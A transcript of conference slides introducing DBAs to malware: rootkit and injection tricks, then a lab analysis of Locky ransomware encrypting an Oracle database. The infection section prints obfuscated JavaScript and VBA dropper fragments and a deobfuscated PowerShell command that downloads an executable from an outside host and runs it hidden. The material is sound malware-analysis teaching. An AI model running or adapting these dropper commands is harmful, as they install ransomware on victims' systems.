MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...
Transcript of MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...
![Page 1: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/1.jpg)
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
1
GUOB TECH DAY 2017 – LA OTN TOUR
(INTRODUCTORY LECTURE FOR DBAs)
By Alexandre Borges
MALWARES ON WINDOWS AND LINUX: THE
WORST THREAT FOR DATABASES
![Page 2: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/2.jpg)
PROFILE AND TOC
TOC:
• Introduction
• Infection
• Test Environment
• Memory Analysis
• Quick Dynamic and Static Analysis
• Last words
• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware
Analysis, Memory Analysis, Digital Forensics,
Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-
instructor at Symantec.
• Member of the CHFI Advisory Board in EC-Council.
• Reviewer member of the The Journal of Digital
Forensics, Security and Law.
• Refereer on Digital Investigation:The International
Journal of Digital Forensics & Incident Response
• Author of “Oracle Solaris Advanced Administration
book”
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
![Page 3: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/3.jpg)
WARNING !!!
• Please, pay attention in the following considerations:
• It is NOT ALLOWED to take pictures of the slides.
• It is NOT ALLOWED to record the lecture.
• It is NOT ALLOWED to film the lecture.
• Please, respect the speaker and his material.
HTTP://ALEXANDREBORGES.ORG 3
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
![Page 4: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/4.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 4
![Page 5: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/5.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 5
• FACT: Malwares are destroying the digital world.
• Several types of malwares:
• Ring 3 (ransomwares included)
• Ring 0 (kernel and bootkits malwares)
• Ring -1 (VMM)
• Ring -2 (SMM)
• Ring -3 ? (Intel Management Engine)
• Number of malwares infecting BIOS / UEFI has been increasing.
• Malwares running on GPU
![Page 6: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/6.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 6
• Malwares have used several tricks for making the detection harder than the
usual:
• Process hiding (DKOM)
• Process Replacement (Hollowing)
• DLL hiding (by manipulating _LDR_DATA_TABLE_ENTRY)
• Services hiding + Service Hijacking
• Hidden Sockets
• Code Injection (multiple methods)
• Hooking (code, IAT, EAT)
• Binary hidden in the Registry
![Page 7: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/7.jpg)
INTRODUCTION
flink
101
blink
flink
102
blink
flink
103
blink
flink
103
blink
flink
102
blink
flink
101
blink
DKOM (Direct Kernel
Object Manipulation) on
the processes list.
![Page 8: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/8.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 8
.....
push param3
push param2
push param1
call good_function
mov ebx, eax
....
push ebp
mov esp, ebp
...good things...
call bad_function
....
ret
push ebp
mov esp, ebp
...bad things...
ret
Basic Function Hooking
![Page 9: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/9.jpg)
INTRODUCTION
• NtClose function (from ntdll.dll) being hooked:
0x7c90cfd0 b819000000 MOV EAX, 0x19
0x7c90cfd5 ba5000907c MOV EDX, 0x7c900050
0x7c90cfda ffd2 CALL EDX
0x7c90cfdc c20400 RET 0x4
0x7c90cfdf 90 NOP
0x7c90cfe0 b81a000000 MOV EAX, 0x1a
0x7c90cfe5 ba DB 0xba
0x7c90cfe6 0003 ADD [EBX], AL
HTTP://ALEXANDREBORGES.ORG 9
Hooking
![Page 10: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/10.jpg)
INTRODUCTION
0x7c900050 b203 MOV DL, 0x3
0x7c900052 eb08 JMP 0x7c90005c
0x7c900054 b204 MOV DL, 0x4
0x7c900056 eb04 JMP 0x7c90005c
0x7c900058 b205 MOV DL, 0x5
0x7c90005a eb00 JMP 0x7c90005c
0x7c90005c 52 PUSH EDX
0x7c90005d e804000000 CALL 0x7c900066
0x7c900062 f20094005aff2269 ADD [EAX+EAX+0x6922ff5a], DL
0x7c90006a 6e OUTS DX, BYTE [ESI]
.....
HTTP://ALEXANDREBORGES.ORG 10
Hooking
Anti-disassembly
trick.
![Page 11: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/11.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 11
• And about Injection techniques? There are many methods:
• Remote DLL Injection it is easily detected because the DLL
must be on disk before being injected.
• PE Injection a PE file, which has its IAT configured for the
target process, is written and forced to be executed into the
addressing space of the target process.
• Reflective Injection it is similar to the previous one, but the
code (usually a DLL) manages its initialization.
• APC Injection a malicious code is executed by attaching to an
APC (Asynchronous Procedure Call) of the target thread.
![Page 12: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/12.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 12
• Other tricks:
• Hooking SSDT
• Hooking IDT
• Orphan Threads
• IRP Hooking
• Hiding kernel drivers
• Bypassing KCS (Kernel Code Signing)
• Callbacks
• Filtering Drivers
![Page 13: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/13.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 13
• The analysis can be difficult because there are several anti -analysis techniques:
• Anti-Debugging
• Anti-Disassembly
• Anti-VMware
• Packers (common and virtualized ones)
• Obfuscation
• .NET tricks
• Powershell + WMI
![Page 14: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/14.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 14
• There are many threats infecting firmwares, which are persistent and stealth.
• They can replace the OS boot loader, patch the kernel, and so on...
• Petya (MBR ransomware)
• Mebromi (BIOS rootkit)
• Gapz (BIOS parameter block modification)
• TDL4
![Page 15: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/15.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 15
https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
![Page 16: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/16.jpg)
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 16
• http://privacy-pc.com/articles/ransomware-chronicle.html
![Page 17: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/17.jpg)
INTRODUCTION - KASPERSKY OVERALL
STATISTICS FOR 2016
HTTP://ALEXANDREBORGES.ORG 17
https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_
2016_Statistics_ENG.pdf
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
![Page 18: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/18.jpg)
INTRODUCTION - KASPERSKY OVERALL
STATISTICS FOR 2016
HTTP://ALEXANDREBORGES.ORG 18
https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_
2016_Statistics_ENG.pdf
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
![Page 19: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/19.jpg)
INTRODUCTION - SYMANTEC INTERNET
SECURITY THREAT REPORT 2016
HTTP://ALEXANDREBORGES.ORG 19
https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
Huh? Are you sure
that Linux systems are
safe against malwares?
![Page 20: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/20.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 20
![Page 21: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/21.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 21
• Malwares have three main goals when they infect a system:
• Owning the system for using it in future attacks
• Stealing data
• Hijacking data (ransomwares)
• We know the main techniques for infection:
• USB
• Network sharing
• Exploiting vulnerabilities (remember WannaCry)
![Page 22: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/22.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 22
Click to die
![Page 23: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/23.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 23
Obfuscated code. However, it is trivial
to solve it.
![Page 24: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/24.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 24
Obfuscated code. Again, it is trivial to solve it.
![Page 25: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/25.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 25
• function nomusta(prototu){return prototu.replace(/AA/g,"");}
• var fuka = new
ActiveXObject(nomusta("MSXAAML2.XMLHTAATP")
• fuka.open(jacob[3-2],
""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
• XMLHttpRequest object
• Represents an XML request using HTTP.
• It has an open method that requests a synchronous or
asynchronous file download from a specific URL.
![Page 26: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/26.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 26
• XMLHttpRequest object also has a send method,
which sends an HTTP request to the server and
receives a response.
• function zulum(pikue) {pikue.send( );}
• zulum(fuka);
• function hust(gulibator){eval(gulibator);}
• hust(gusar);
![Page 27: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/27.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 27
Click to die
![Page 28: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/28.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 28
Probably, the malware’s author wants to execute something bad on your system.
![Page 29: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/29.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 29
Sub Document_Open( )
urgixbe = "gwefakqyrb"
If (odbumuwgi = 811) Then
If (osduzu = "icdyclaw") Then
….
hnevo = Shell(ibovuhl, unymk)
niwwyshomq = Empty
tnovgistoqme = "58732" & 18
sgukkezihh = "46106" & 81
...
Again, obfuscated code. Once more, It is very simple
to bypass it.
![Page 30: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/30.jpg)
INFECTION
HTTP://ALEXANDREBORGES.ORG 30
"CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -
nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT
SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/
search.php','%appdaTA%.ExE');start-prOceSS
'%AppDatA%.Exe'""
I have not shown the desobfuscation process because it is really simple.
![Page 31: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/31.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 31
![Page 32: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/32.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 32
WINDOWS 8
x64 Internet
WINDOWS 8
x64
Oracle Database
12.2 installed
Oracle Instant Client
12.2 installed
NAT
![Page 33: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/33.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 33
• LISTENER.ORA
![Page 34: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/34.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 34
• TNSNAMES.ORA
![Page 35: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/35.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 35
C:\instantclient_12_2> sqlplus system@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=win81.example.com)(Port=1521))(CONNECT_DATA=(SID=orcl)))
Enter password: Malware123!
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
SQL> select instance_name from v$instance;
INSTANCE_NAME
------------------------------------------------
orcl
![Page 36: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/36.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 36
![Page 37: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/37.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 37
Infected with Locky (version JUL/30/2017)
![Page 38: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/38.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 38
![Page 39: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/39.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 39
![Page 40: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/40.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 40
![Page 41: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/41.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 41
Encrypted database
files. On Windows,
you are lucky because
it prevents two
processes to alter the
same file at same time.
On Linux...no luck
![Page 42: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/42.jpg)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 42
Photo from Twitter of my colleague Valerie Thomas (@hacktress09 )
After Oracle database being encrypted by the ransomware....
![Page 43: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/43.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 43
![Page 44: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/44.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 44
Probably, the ransomware is destroying snapshots
![Page 45: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/45.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 45
Running as administrator
![Page 46: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/46.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 46
DLLs that are responsible for
accessing the network/Internet ;)
32-bit code running on x64. Of course.
![Page 47: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/47.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 47
Class Identifier registry. Is COM present?
Interesting Registry entries.
![Page 48: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/48.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 48
Few URLs on the memory
![Page 49: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/49.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 49
Locky ransomware connecting to C2 (Command
and Control Server).
![Page 50: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/50.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 50
Russia...again?
![Page 51: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/51.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 51
VAD Short and RWE.
Code Injection,of course.
VAD == Virtual Address
Descriptor)
![Page 52: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/52.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 52
Three injected code saved on disk. Pay attention: three different hashes.
![Page 53: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/53.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 53
Interesting string
references and DLLs.
![Page 54: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/54.jpg)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 54
It is a hooking, but this
specific one is not
important right now
![Page 55: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/55.jpg)
QUICK STATIC AND DYNAMIC
ANALYSIS
HTTP://ALEXANDREBORGES.ORG 55
![Page 56: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/56.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 56
It seems that our malware is the Locky
ransomware, isn’t it?
![Page 57: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/57.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 57
Take a look at
the entropy.
Boring to reverse
